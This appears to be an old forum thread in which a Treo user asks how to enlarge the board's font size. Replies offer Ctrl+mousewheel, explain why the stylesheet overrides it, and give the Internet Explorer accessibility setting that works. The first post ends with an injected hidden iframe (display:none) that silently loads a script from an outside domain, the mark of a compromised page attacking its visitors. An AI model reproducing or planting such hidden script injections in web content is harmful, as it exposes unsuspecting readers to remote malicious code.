+ Reply to Thread
    I-300 Novice

Type Font Size Throughout This Forum

Is there a way I can set my profile up on this forum so that all of the messages and discussions, etc. come up in a larger font size?

The default font size is very hard to read. Thanks in advance for your help.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Ahmed V. Ismail
    A Smartphone Addict

You should probably post this in the site suggestions forum.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

I-300 Novice

Larger Type Font on Forum

I tried a search and found nothing. I thought maybe there was a spot in my profile or a helpful forum member who could guide me to an answer.

If someone does know the answer, I would appreciate the answer.

Thank you.
    Ahmed V. Ismail
    A Smartphone Addict

Re: Larger Type Font on Forum

[quote:cf25ffb5db="PHCismail"]I tried a search and found nothing.[/quote:cf25ffb5db]

Don't take Alex's search comment personally, it is simply part of his signature file as a gentle reminder to us all to search before asking.

As best I can tell from reading the forums over at phpBB.com, the font size is all set by the administrator and is not customizable by the individual members. Thus, Alex was suggesting you post this question in the Site / Ideas segment instead of the 7135 segment.

Unfortunately, even if you are using IE as your browser, you can not overide the font settings.
    - Archnemysis

I-300 Novice
    Thanks for your considerate answer.
    Ahmed V. Ismail
    A Smartphone Addict

Thanks Archnemysis. I've toned down my signature.
    www.treobits.com
    (News, Internet Radio, Software/Hardware Store, Ringtones, Wallpaper, and more...)

check this out!

HEre is an unbelieveable tip that works on ANY web page to temporarilt increase the font size:

1. Take your mouse and highlight a paragraph such as this one.

2. Hold down the control key.

3. Roll the mouse wheel towards you several clicks (the scroll in the middle of the mouse that normally is used for scrolling- not the ball on the bottom of the mouse).

4. To decrease size, do the same thing but scroll the mousewheel the opposite direction

This trick works in IE, Outlook, Eudora, Word, Excel, and just about everything else these days

check this out!

HEre is an unbelieveable tip that works on ANY web page to temporarilt increase the font size:

1. Take your mouse and highlight a paragraph such as this one.

2. Hold down the control key.

3. Roll the mouse wheel towards you several clicks (the scroll in the middle of the mouse that normally is used for scrolling- not the ball on the bottom of the mouse).

4. To decrease size, do the same thing but scroll the mousewheel the opposite direction

This trick works in IE, Outlook, Eudora, Word, Excel, and just about everything else these days

Unless I am missing something, that does not work with the phpbb bulletin boards. It does work with most web pages. But for reasons that I am realy not sure of, all it does with these bulletin boards is increase the size of some of the spacing lines at the very top.

Just in case it does work for someone else, and it is just not working for me I use:
    Win 2000
    IE6.0.260
    - Archnemysis

crazyRay, have you tried this trick on the board yourself?

I use IE 5.5 and it doesn't seem to work. It does change the font setting of IE, but for this board it only appears to affect the line spacing and not the actual text.

I think it is because this board explicitly specifies the font size (or uses some special stylesheet formatting), so it can't be overridden by IE's settings.

I-300 Novice

Thanks for trying, guys...:(

I know for you younger guys this isn't a big deal....and I do appreciate your help. The folks who put together the sphi300.com forum have it set at a nice font size for easy reading by the over 40 crowd...

If anyone else comes up with a brainstorm, please let me know.

Thanks again!
    Ahmed V. Ismail
    A Smartphone Addict

Here's the solution for Internet Explorer!!!

Don't know how I could have missed this option.

Go to Internet Options -&gt; Accessibility.
    Check the "ignore font sizes" option.

Now the
    View -&gt; Text Size
    can control the size. For easier access to Text Size, customize your toolbar to include the "Size" button.

Enjoy!

For anyone interested, as in us presbyopic types, Microsoft has the following site where you can use Clear Type. I have found it helps a great deal with the Princeton flat panel monitor I use.

http://www.microsoft.com/windowsxp/pro/using/howto/customize/cleartype/tuner/default.asp

[quote:21f3d5764a="Gary G. Little"]For anyone interested, as in us presbyopic types, Microsoft has the following site where you can use Clear Type. I have found it helps a great deal with the Princeton flat panel monitor I use.

http://www.microsoft.com/windowsxp/pro/using/howto/customize/cleartype/tuner/default.asp[/quote:21f3d5764a]
    I am an optometrist and "computer vision syndrome" is a very common complaint in the patient's I see. Use of a pda just compounds the problem. Clear Type is a good suggestion for assisting with overcoming the symptoms associated with computer vison syndrome. Oh...and I am pretty experienced at dealing with presbyopia...I'm turning 60 in a few months
    Dave

I-300 Novice
    thanks...the suggestion re: the 'Internet options' works great..
    Ahmed V. Ismail
    A Smartphone Addict